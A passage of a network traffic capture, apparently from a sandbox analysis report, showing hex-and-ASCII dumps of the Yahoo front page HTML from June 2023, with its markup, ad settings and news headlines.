                                                                                                                                                                        Data Ascii: g.com/uu/api/res/1.2/1qBaGjac_m8wo0q_M7idzw--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/bbc_us_articles_995/056b1c25a2628aa3f204f268d35f22c7.cf.jpg" alt=""/><div class="Lh(15px) C(--cobalt) C(--dory):h Fw(b) Lin
                                                                                                                                                                        2023-06-02 11:13:21 UTC636INData Raw: 50 61 74 68 50 72 65 66 69 78 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6e 63 70 50 61 72 61 6d 73 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 71 75 65 72 79 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 70 61 67 65 43 6f 6e 74 65 78 74 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 75 26 71 75 6f 74 3b 3a 30 2c 26 71 75 6f 74 3b 70 61 67 65 54 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 6f 6d 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 69 74 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 66 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 70 70 4e 61 6d 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 6d 65 67 61 73 74 72 6d 26 71 75 6f 74 3b 7d 7d 7d 7d 22 20 64 61 74 61 2d 77 66
                                                                                                                                                                        Data Ascii: PathPrefix&quot;:&quot;/fp_ms/_rcv/remote&quot;,&quot;ncpParams&quot;:{&quot;query&quot;:{&quot;pageContext&quot;:{&quot;lu&quot;:0,&quot;pageType&quot;:&quot;home&quot;,&quot;site&quot;:&quot;fp&quot;,&quot;appName&quot;:&quot;megastrm&quot;}}}}" data-wf
                                                                                                                                                                        2023-06-02 11:13:21 UTC637INData Raw: 36 36 70 78 3b 77 69 64 74 68 3a 36 36 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 36 36 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 64 65 66 61 75 6c 74 2f 32 30 32 30 30 39 31 30 2f 4f 76 61 6c 5f 78 33 2e 70 6e 67 29 22 3e 3c 73 76 67 20 63 6c 61 73 73 3d 22 44 28 62 29 20 50 6f 73 28 72 29 20 4d 73 74 61 72 74 28 32 70 78 29 20 43 75 72 28 70 29 22 20 77 69 64 74 68 3d 22 32 37 22 20 73 74 79 6c 65 3d 22 6c 65 66 74 3a 32 30 70 78 3b 74 6f 70 3a 32 30 70 78 3b 66 69 6c 6c 3a 23 66 66 66 3b 73 74 72 6f 6b 65 3a 23 66 66 66 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f
                                                                                                                                                                        Data Ascii: 66px;width:66px;background-size:66px;background-image:url(https://s.yimg.com/cv/apiv2/default/20200910/Oval_x3.png)"><svg class="D(b) Pos(r) Mstart(2px) Cur(p)" width="27" style="left:20px;top:20px;fill:#fff;stroke:#fff;stroke-width:0;vertical-align:botto
                                                                                                                                                                        2023-06-02 11:13:21 UTC639INData Raw: 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 66 6f 78 5f 77 65 61 74 68 65 72 5f 76 69 64 65 6f 73 5f 32 30 32 2f 63 38 65 65 39 62 35 38 61 36 37 36 39 31 34 36 34 34 34 62 33 65 31 65 34 35 66 38 39 38 33 33 2e 63 66 2e 6a 70 67 22 20 61 6c 74 3d 22 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 69 6d 61 67 65 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 65 6e 64 28 34 35 70 78 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 46 7a 28 31 36 70 78 29 20 46 77 28 62 29 20 54 74 28 63 29 20 44 28 69 62 29 20 4d 62 28 34 70 78 29 20 4d 65 6e 64 28 39 70 78 29 20 4c 68 28 31 29 20 43 28 24 63 61 74 2d 6e 65 77 73 29 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61
                                                                                                                                                                        Data Ascii: zenfs.com/en/fox_weather_videos_202/c8ee9b58a6769146444b3e1e45f89833.cf.jpg" alt="" data-test-locator="stream-item-image"/></a></div> </div><div class="Pend(45px)"><div class="Fz(16px) Fw(b) Tt(c) D(ib) Mb(4px) Mend(9px) Lh(1) C($cat-news)" data-test-loca
                                                                                                                                                                        2023-06-02 11:13:21 UTC640INData Raw: 65 77 73 22 3e 3c 73 70 61 6e 20 69 64 3d 22 73 74 72 65 61 6d 5f 69 74 65 6d 5f 74 69 74 6c 65 5f 36 22 3e 57 61 74 63 68 3a 20 54 6f 75 72 69 73 74 20 74 61 6b 65 73 20 73 65 6c 66 69 65 20 6e 65 78 74 20 74 6f 20 62 69 73 6f 6e 20 69 6e 20 59 65 6c 6c 6f 77 73 74 6f 6e 65 20 4e 61 74 69 6f 6e 61 6c 20 50 61 72 6b 2c 20 57 79 6f 6d 69 6e 67 3c 2f 73 70 61 6e 3e 3c 75 20 63 6c 61 73 73 3d 22 53 74 72 65 74 63 68 65 64 42 6f 78 22 3e 3c 2f 75 3e 3c 2f 61 3e 3c 2f 68 33 3e 3c 70 20 63 6c 61 73 73 3d 22 4c 69 6e 65 43 6c 61 6d 70 28 32 2c 33 38 70 78 29 20 66 69 6e 61 6e 63 65 2d 74 69 63 6b 65 72 2d 66 65 74 63 68 2d 73 75 63 63 65 73 73 5f 44 28 6e 29 20 73 75 62 2d 75 70 73 65 6c 6c 2d 66 65 74 63 68 2d 73 75 63 63 65 73 73 5f 44 28 6e 29 20 46 7a 28 31
                                                                                                                                                                        Data Ascii: ews"><span id="stream_item_title_6">Watch: Tourist takes selfie next to bison in Yellowstone National Park, Wyoming</span><u class="StretchedBox"></u></a></h3><p class="LineClamp(2,38px) finance-ticker-fetch-success_D(n) sub-upsell-fetch-success_D(n) Fz(1
                                                                                                                                                                        2023-06-02 11:13:21 UTC641INData Raw: 63 76 2f 72 65 6d 6f 74 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6e 63 70 50 61 72 61 6d 73 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 71 75 65 72 79 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 70 61 67 65 43 6f 6e 74 65 78 74 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 75 26 71 75 6f 74 3b 3a 30 2c 26 71 75 6f 74 3b 70 61 67 65 54 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 6f 6d 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 69 74 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 66 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 70 70 4e 61 6d 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 6d 65 67 61 73 74 72 6d 26 71 75 6f 74 3b 7d 7d 7d 7d 22 20 64 61 74 61 2d 77 66 2d 62 6f 75 6e 64 61 72 79 3d 22 64 72 61 77 65 72 2d 66 65 74 63 68 2d 62 6f 75 6e 64 61 72 79
                                                                                                                                                                        Data Ascii: cv/remote&quot;,&quot;ncpParams&quot;:{&quot;query&quot;:{&quot;pageContext&quot;:{&quot;lu&quot;:0,&quot;pageType&quot;:&quot;home&quot;,&quot;site&quot;:&quot;fp&quot;,&quot;appName&quot;:&quot;megastrm&quot;}}}}" data-wf-boundary="drawer-fetch-boundary
                                                                                                                                                                        2023-06-02 11:13:21 UTC642INData Raw: 61 73 73 3d 22 48 28 30 29 20 54 28 30 70 78 29 20 42 64 72 73 28 32 70 78 29 20 53 74 61 72 74 28 30 29 20 50 6f 73 28 72 29 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 35 2e 39 31 25 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 69 6d 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 69 66 65 73 74 79 6c 65 2f 66 61 6e 73 2d 74 68 69 6e 6b 2d 61 6e 6e 65 2d 68 61 74 68 61 77 61 79 2d 6f 7a 65 6d 70 69 63 2d 31 35 30 30 34 37 34 30 34 2e 68 74 6d 6c 22 20 64 61 74 61 2d 79 6c 6b 3d 22 69 74 63 3a 30 3b 65 6c 6d 3a 69 6d 67 3b 65 6c 6d 74 3a 63 74 3b 69 6d 67 74 3a 73 73 3b 62 70 6f 73 3a 31 3b 63 70 6f 73 3a 37 3b 63 70 6f 73 79 3a 31 36 3b 72 73 70 6e 73 3a 6e 61 76 3b 74
                                                                                                                                                                        Data Ascii: ass="H(0) T(0px) Bdrs(2px) Start(0) Pos(r)" style="padding-bottom:55.91%" data-test-locator="stream-item-image"><a href="/lifestyle/fans-think-anne-hathaway-ozempic-150047404.html" data-ylk="itc:0;elm:img;elmt:ct;imgt:ss;bpos:1;cpos:7;cposy:16;rspns:nav;t
                                                                                                                                                                        2023-06-02 11:13:21 UTC644INData Raw: 30 20 4d 74 28 30 29 20 4c 68 28 31 2e 33 29 20 46 7a 28 31 39 70 78 29 20 73 74 72 65 61 6d 2d 69 74 65 6d 2d 74 69 74 6c 65 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6a 73 2d 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 72 61 70 69 64 6e 6f 66 6f 6c 6c 6f 77 20 77 61 66 65 72 2d 63 61 61 73 20 44 28 62 29 20 54 64 28 6e 29 20 54 64 28 6e 29 3a 66 20 43 28 2d 2d 63 6f 62 61 6c 74 29 20 43 28 2d 2d 64 6f 72 79 29 3a 68 22 20 64 61 74 61 2d 75 75 69 64 3d 22 38 61 30 38 63 65 62 32 2d 66 30 36 35 2d 33 36 31 33 2d 61 64 63 31 2d 61 61 30 32 65 31 39 35 30 35 32 36 22 20 68 72 65 66 3d 22 2f 6c 69 66 65 73 74 79 6c 65 2f 66 61 6e 73 2d 74 68 69 6e 6b
                                                                                                                                                                        Data Ascii: 0 Mt(0) Lh(1.3) Fz(19px) stream-item-title" data-test-locator="stream-item-title"><a class="js-content-viewer rapidnofollow wafer-caas D(b) Td(n) Td(n):f C(--cobalt) C(--dory):h" data-uuid="8a08ceb2-f065-3613-adc1-aa02e1950526" href="/lifestyle/fans-think
                                                                                                                                                                        2023-06-02 11:13:21 UTC645INData Raw: 73 20 6d 61 6b 69 6e 67 20 66 61 6e 73 20 74 61 6c 6b 20 66 6f 72 20 73 6f 20 6d 61 6e 79 20 72 65 61 73 6f 6e 73 21 20 54 68 65 20 34 30 2d 79 65 61 72 2d 6f 6c 64 20 45 69 6c 65 65 6e 20 61 63 74 72 65 73 73 20 6c 6f 6f 6b 65 64 20 69 6e 63 72 65 64 69 62 6c 65 20 61 74 20 74 68 65 20 65 76 65 6e 74 20 77 68 2e 2e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 61 77 65 72 2d 66 65 74 63 68 2d 62 6f 75 6e 64 61 72 79 20 50 6f 73 28 72 29 22 3e 3c 64 69 76 20 64 61 74 61 2d 62 75 63 6b 65 74 3d 22 39 30 30 22 20 64 61 74 61 2d 63 66 67 3d 22 7b 26 71 75 6f 74 3b 61 64 4d 65 74 61 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 61 64 63 68 6f 69 63 65 73 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73
                                                                                                                                                                        Data Ascii: s making fans talk for so many reasons! The 40-year-old Eileen actress looked incredible at the event wh...</p></div></div><div class="drawer-fetch-boundary Pos(r)"><div data-bucket="900" data-cfg="{&quot;adMeta&quot;:{&quot;adchoicesUrl&quot;:&quot;https
                                                                                                                                                                        2023-06-02 11:13:21 UTC645INData Raw: 62 61 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 70 6f 6e 73 6f 72 65 64 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 6c 65 67 61 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 75 73 2f 65 6e 2f 79 61 68 6f 6f 2f 70 72 69 76 61 63 79 2f 61 64 69 6e 66 6f 2f 69 6e 64 65 78 2e 68 74 6d 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 44 72 61 77 65 72 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 41 64 4c 69 74 65 55 70 53 65 6c 6c 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 74 72 75 65 7d 2c 26 71 75 6f 74 3b 66 65 61 74 75 72 65 73 26 71 75 6f 74 3b 3a 7b 7d 2c 26 71 75 6f 74 3b 69 31 33 6e 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 62 70 6f 73 26 71 75 6f 74 3b 3a 31 2c
                                                                                                                                                                        Data Ascii: back&quot;,&quot;sponsoredUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;enableDrawerFeedback&quot;:false,&quot;enableAdLiteUpSellFeedback&quot;:true},&quot;features&quot;:{},&quot;i13n&quot;:{&quot;bpos&quot;:1,
                                                                                                                                                                        2023-06-02 11:13:21 UTC647INData Raw: 64 63 38 31 30 61 36 34 34 37 35 22 20 64 61 74 61 2d 63 70 6f 73 3d 22 38 22 20 64 61 74 61 2d 63 70 6f 73 79 3d 22 31 37 22 20 64 61 74 61 2d 77 69 6b 69 73 3d 22 53 70 72 69 6e 67 2c 5f 54 65 78 61 73 2c 46 6f 78 5f 4e 65 77 73 2c 57 61 74 65 72 5f 62 6f 74 74 6c 65 22 20 64 61 74 61 2d 70 72 6f 70 65 72 74 79 3d 22 55 2e 53 2e 22 20 64 61 74 61 2d 69 31 33 6e 2d 63 66 67 3d 22 7b 26 71 75 6f 74 3b 62 70 6f 73 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 4c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 2e 53 2e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 63 70 6f 73 26 71 75 6f 74 3b 3a 38 2c 26 71 75 6f 74 3b 63 70 6f 73 79 26 71 75 6f 74 3b 3a 31 37 7d 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72
                                                                                                                                                                        Data Ascii: dc810a64475" data-cpos="8" data-cposy="17" data-wikis="Spring,_Texas,Fox_News,Water_bottle" data-property="U.S." data-i13n-cfg="{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;U.S.&quot;,&quot;cpos&quot;:8,&quot;cposy&quot;:17}" data-test-locator="str
                                                                                                                                                                        2023-06-02 11:13:21 UTC648INData Raw: 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 65 6e 64 28 34 35 70 78 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 46 7a 28 31 36 70 78 29 20 46 77 28 62 29 20 54 74 28 63 29 20 44 28 69 62 29 20 4d 62 28 34 70 78 29 20 4d 65 6e 64 28 39 70 78 29 20 4c 68 28 31 29 20 43 28 24 63 61 74 2d 75 73 29 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 63 61 74 65 67 6f 72 79 2d 6c 61 62 65 6c 22 3e 55 2e 53 2e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 43 28 24 73 74 72 65 61 6d 49 74 65 6d 47 72 61 79 29 20 46 7a 28 31 32 70 78 29 20 44 28 69 62 29 20 4d 62 28 34 70 78 29 20 4c 68 28 31 29 22 20 69 64 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 70 75 62 6c 69
                                                                                                                                                                        Data Ascii: </a></div> </div><div class="Pend(45px)"><div class="Fz(16px) Fw(b) Tt(c) D(ib) Mb(4px) Mend(9px) Lh(1) C($cat-us)" data-test-locator="stream-item-category-label">U.S.</div><div class="C($streamItemGray) Fz(12px) D(ib) Mb(4px) Lh(1)" id="stream-item-publi
                                                                                                                                                                        2023-06-02 11:13:21 UTC649INData Raw: 2d 74 69 63 6b 65 72 2d 66 65 74 63 68 2d 73 75 63 63 65 73 73 5f 44 28 6e 29 20 73 75 62 2d 75 70 73 65 6c 6c 2d 66 65 74 63 68 2d 73 75 63 63 65 73 73 5f 44 28 6e 29 20 46 7a 28 31 34 70 78 29 20 4c 68 28 31 38 70 78 29 20 43 28 24 73 74 72 65 61 6d 53 75 6d 6d 61 72 79 43 6c 61 73 73 29 20 4d 28 30 29 20 42 78 7a 28 62 62 29 20 4d 62 28 31 32 70 78 29 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 73 75 6d 6d 61 72 79 22 3e 43 6f 6c 62 79 20 52 69 63 68 61 72 64 73 2c 20 33 31 2c 20 68 61 73 20 62 65 65 6e 20 6d 69 73 73 69 6e 67 20 73 69 6e 63 65 20 68 65 20 61 70 70 61 72 65 6e 74 6c 79 20 6c 65 66 74 20 68 69 73 20 68 6f 6d 65 20 69 6e 20 53 70 72 69 6e 67 2c 20 54 65 78 61 73 2c 20 6f 6e 20 4d 61
                                                                                                                                                                        Data Ascii: -ticker-fetch-success_D(n) sub-upsell-fetch-success_D(n) Fz(14px) Lh(18px) C($streamSummaryClass) M(0) Bxz(bb) Mb(12px)" data-test-locator="stream-item-summary">Colby Richards, 31, has been missing since he apparently left his home in Spring, Texas, on Ma
                                                                                                                                                                        2023-06-02 11:13:21 UTC650INData Raw: 75 6f 74 3b 3a 26 71 75 6f 74 3b 66 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 70 70 4e 61 6d 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 6d 65 67 61 73 74 72 6d 26 71 75 6f 74 3b 7d 7d 7d 7d 22 20 64 61 74 61 2d 77 66 2d 62 6f 75 6e 64 61 72 79 3d 22 64 72 61 77 65 72 2d 66 65 74 63 68 2d 62 6f 75 6e 64 61 72 79 22 20 64 61 74 61 2d 77 66 2d 72 65 74 72 79 2d 63 6f 75 6e 74 3d 22 31 22 20 64 61 74 61 2d 77 66 2d 74 61 72 67 65 74 3d 22 2e 64 72 61 77 65 72 2d 66 65 74 63 68 2d 74 61 72 67 65 74 22 20 64 61 74 61 2d 77 66 2d 74 72 69 67 67 65 72 3d 22 6f 6e 4c 6f 61 64 22 20 64 61 74 61 2d 77 66 2d 75 72 6c 3d 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 3f 6d 5f 6d 6f 64 65 3d 6a 73 6f 6e 26 61 6d 70 3b 6d 5f 69 64 3d 72 65 61 63 74 2d 77 61
                                                                                                                                                                        Data Ascii: uot;:&quot;fp&quot;,&quot;appName&quot;:&quot;megastrm&quot;}}}}" data-wf-boundary="drawer-fetch-boundary" data-wf-retry-count="1" data-wf-target=".drawer-fetch-target" data-wf-trigger="onLoad" data-wf-url="/fp_ms/_rcv/remote?m_mode=json&amp;m_id=react-wa
                                                                                                                                                                        2023-06-02 11:13:21 UTC652INData Raw: 77 73 2f 6d 65 67 61 6e 2d 66 6f 78 73 2d 63 6f 73 74 61 72 2d 73 61 79 73 2d 6d 61 63 68 69 6e 65 2d 31 31 30 30 34 31 33 39 37 2e 68 74 6d 6c 22 20 64 61 74 61 2d 79 6c 6b 3d 22 69 74 63 3a 30 3b 65 6c 6d 3a 69 6d 67 3b 65 6c 6d 74 3a 63 74 3b 69 6d 67 74 3a 73 73 3b 62 70 6f 73 3a 31 3b 63 70 6f 73 3a 39 3b 63 70 6f 73 79 3a 31 38 3b 72 73 70 6e 73 3a 6e 61 76 3b 74 31 3a 61 33 3b 74 32 3a 73 74 72 6d 3b 74 33 3a 63 74 3b 63 63 6f 64 65 3a 6d 65 67 61 73 74 72 65 61 6d 5f 75 6e 69 66 69 65 64 5f 5f 65 6e 2d 55 53 5f 5f 66 72 6f 6e 74 70 61 67 65 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 73 6b 74 6f 70 5f 5f 67 61 5f 5f 6d 61 69 6e 2e 66 70 45 78 70 6c 3b 63 74 3a 73 74 6f 72 79 3b 67 3a 32 30 31 62 64 37 64 33 2d 61 31 32 63 2d
                                                                                                                                                                        Data Ascii: ws/megan-foxs-costar-says-machine-110041397.html" data-ylk="itc:0;elm:img;elmt:ct;imgt:ss;bpos:1;cpos:9;cposy:18;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__main.fpExpl;ct:story;g:201bd7d3-a12c-
                                                                                                                                                                        2023-06-02 11:13:21 UTC653INData Raw: 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6a 73 2d 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 72 61 70 69 64 6e 6f 66 6f 6c 6c 6f 77 20 77 61 66 65 72 2d 63 61 61 73 20 44 28 62 29 20 54 64 28 6e 29 20 54 64 28 6e 29 3a 66 20 43 28 2d 2d 63 6f 62 61 6c 74 29 20 43 28 2d 2d 64 6f 72 79 29 3a 68 22 20 64 61 74 61 2d 75 75 69 64 3d 22 32 30 31 62 64 37 64 33 2d 61 31 32 63 2d 33 36 32 31 2d 39 31 64 64 2d 31 35 65 36 36 66 35 34 62 35 37 66 22 20 68 72 65 66 3d 22 2f 6e 65 77 73 2f 6d 65 67 61 6e 2d 66 6f 78 73 2d 63 6f 73 74 61 72 2d 73 61 79 73 2d 6d 61 63 68 69 6e 65 2d 31 31 30 30 34 31 33 39 37 2e 68 74 6d 6c 22 20 64 61 74 61 2d 79 6c 6b 3d 22 69 74 63 3a 30 3b 65 6c 6d 3a 68
                                                                                                                                                                        Data Ascii: -locator="stream-item-title"><a class="js-content-viewer rapidnofollow wafer-caas D(b) Td(n) Td(n):f C(--cobalt) C(--dory):h" data-uuid="201bd7d3-a12c-3621-91dd-15e66f54b57f" href="/news/megan-foxs-costar-says-machine-110041397.html" data-ylk="itc:0;elm:h
                                                                                                                                                                        2023-06-02 11:13:21 UTC654INData Raw: 61 63 68 69 6e 65 20 47 75 6e 20 4b 65 6c 6c 79 20 77 61 73 20 26 71 75 6f 74 3b 66 75 6c 6c 79 20 75 6e 68 69 6e 67 65 64 26 71 75 6f 74 3b 20 61 66 74 65 72 20 68 65 20 6d 61 64 65 20 74 68 65 20 73 75 67 67 65 73 74 69 6f 6e 20 74 6f 20 4d 65 67 61 6e 20 46 6f 78 2e 3c 2f 70 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 4c 69 73 74 28 6e 29 20 4d 74 28 31 32 70 78 29 20 46 7a 28 31 32 70 78 29 20 50 6f 73 28 72 29 20 50 28 30 29 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 73 74 72 65 61 6d 2d 63 6c 75 73 74 65 72 2d 69 74 65 6d 20 46 6c 28 73 74 61 72 74 29 20 57 28 35 30 25 29 20 57 28 31 30 30 25 29 21 2d 2d 6d 64 31 31 36 30 20 4d 62 28 38 70 78 29 2d 2d 6d 64 31 31 36 30 22 20 64 61 74 61 2d 75 75 69 64 3d 22 39 61 36 34 38 36 65 66 2d 31 63 33 37 2d 33 66 30 31
                                                                                                                                                                        Data Ascii: achine Gun Kelly was &quot;fully unhinged&quot; after he made the suggestion to Megan Fox.</p><ul class="List(n) Mt(12px) Fz(12px) Pos(r) P(0)"><li class="stream-cluster-item Fl(start) W(50%) W(100%)!--md1160 Mb(8px)--md1160" data-uuid="9a6486ef-1c37-3f01
                                                                                                                                                                        2023-06-02 11:13:21 UTC656INData Raw: 3c 69 6d 67 20 63 6c 61 73 73 3d 22 46 6c 28 73 74 61 72 74 29 20 57 28 32 39 25 29 20 4d 69 77 28 36 35 70 78 29 20 4d 61 77 28 37 32 70 78 29 20 4d 65 6e 64 28 31 30 70 78 29 20 54 72 73 64 75 28 30 73 29 21 20 44 28 6e 29 2d 2d 6d 64 31 31 36 30 20 42 64 72 73 28 32 70 78 29 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 75 75 2f 61 70 69 2f 72 65 73 2f 31 2e 32 2f 54 4d 30 74 33 4a 71 74 32 57 30 6b 34 51 49 4b 5f 2e 57 68 57 77 2d 2d 7e 42 2f 5a 6d 6b 39 63 33 52 79 61 57 30 37 61 44 30 78 4e 44 41 37 63 54 30 35 4d 44 74 33 50 54 45 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 62 75 7a 7a 66 65 65 64 5f 61
                                                                                                                                                                        Data Ascii: <img class="Fl(start) W(29%) Miw(65px) Maw(72px) Mend(10px) Trsdu(0s)! D(n)--md1160 Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/TM0t3Jqt2W0k4QIK_.WhWw--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/buzzfeed_a
                                                                                                                                                                        2023-06-02 11:13:21 UTC657INData Raw: 74 32 3a 73 74 72 6d 3b 74 33 3a 63 74 3b 63 63 6f 64 65 3a 6d 65 67 61 73 74 72 65 61 6d 5f 75 6e 69 66 69 65 64 5f 5f 65 6e 2d 55 53 5f 5f 66 72 6f 6e 74 70 61 67 65 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 73 6b 74 6f 70 5f 5f 67 61 5f 5f 6d 61 69 6e 2e 66 70 45 78 70 6c 3b 63 74 3a 73 74 6f 72 79 3b 67 3a 36 37 38 37 62 64 61 32 2d 38 35 35 32 2d 33 64 34 62 2d 61 64 34 37 2d 63 30 32 63 36 32 62 39 63 30 35 39 3b 67 72 70 74 3a 73 74 6f 72 79 43 6c 75 73 74 65 72 3b 70 6b 67 74 3a 63 6c 75 73 74 65 72 5f 61 6c 6c 5f 69 6d 67 3b 70 6f 73 3a 33 3b 73 6c 6b 3a 41 6c 6c 2d 41 6d 65 72 69 63 61 6e 20 52 65 6a 65 63 74 73 e2 80 99 20 54 79 73 6f 6e 20 52 69 74 74 65 72 20 43 6c 61 69 6d 73 20 4d 61 63 68 69 6e 65 20 47 75 6e 20 4b
                                                                                                                                                                        Data Ascii: t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__main.fpExpl;ct:story;g:6787bda2-8552-3d4b-ad47-c02c62b9c059;grpt:storyCluster;pkgt:cluster_all_img;pos:3;slk:All-American Rejects Tyson Ritter Claims Machine Gun K
                                                                                                                                                                        2023-06-02 11:13:21 UTC658INData Raw: 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 61 64 63 68 6f 69 63 65 73 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 6c 65 67 61 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 75 73 2f 65 6e 2f 79 61 68 6f 6f 2f 70 72 69 76 61 63 79 2f 61 64 69 6e 66 6f 2f 69 6e 64 65 78 2e 68 74 6d 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 64 76 65 72 74 69 73 65 57 69 74 68 55 73 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 64 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 79 61 68 6f 6f 2d 68 6f 6d 65 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 72 65 66 65 72 72 61 6c 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 61 64 2d 66 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 70 6f 6e 73
